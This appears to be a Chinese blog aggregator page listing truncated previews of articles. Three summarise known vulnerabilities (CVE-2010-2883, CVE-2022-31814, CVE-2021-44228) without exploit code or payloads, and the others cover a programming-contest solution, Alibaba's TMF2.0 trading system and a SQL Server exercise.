    作者丨黑蛋一、漏洞描述此漏洞编号CVE-2010-2883,看着是一个很简单的栈溢出漏洞,但是也要看怎么玩了。这个漏洞是AdobeAcrobatReader软件中CoolType.dll在解析字体文件SING表中的uniqueName字段的调用了strcat函数,但是对参数没有做出判断,没有检查uniqueName字段长度,导致了栈溢出......
  • PfSense pfBlockerNG 未授权RCE漏洞(CVE-2022-31814)
    PfSensepfBlockerNG未授权RCE漏洞(CVE-2022-31814)概述PfSense系统的插件pfBlockerNG引起的未授权RCE漏洞pfSense是一个基于FreeBSD操作系统开发的防火墙和路由器软件......
  • 【漏洞复现】Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228)
    【漏洞复现】ApacheLog4j2lookupJNDI注入漏洞(CVE-2021-44228)0x01漏洞描述ApacheLog4j2是一个基于Java的日志记录工具,是对Log4j的升级,它比其前身Log4j1.x......
  • [ [Ynoi2013] 无力回天 NOI2017 ] 解题报告
    [Ynoi2013]无力回天NOI2017首先看到异或,想到能维护异或的东西就那几样(线性基/01trie/数位dp/FWT),再看到求选任意个数后的异或最大值,线性基无疑了。这时再看还要维护什......
  • 2017双11交易系统TMF2.0技术揭秘,实现全链路管理
    摘要: 本文是《2017双11交易系统TMF2.0技术揭秘》演讲整理,主要讲解了基于TMF2.0框架改造的交易平台,通过业务管理域与运行域分离、业务与业务的隔离架构,大幅度提高了业务在可......
  • 2017-D
    2017-D数据库部分使用Windows身份验证登录SQLServer,建立数据库test0322,文件日志保存到一个专门的文件夹建表备份数据库,选定所创建数据库,右键-任务-备份-选择自己......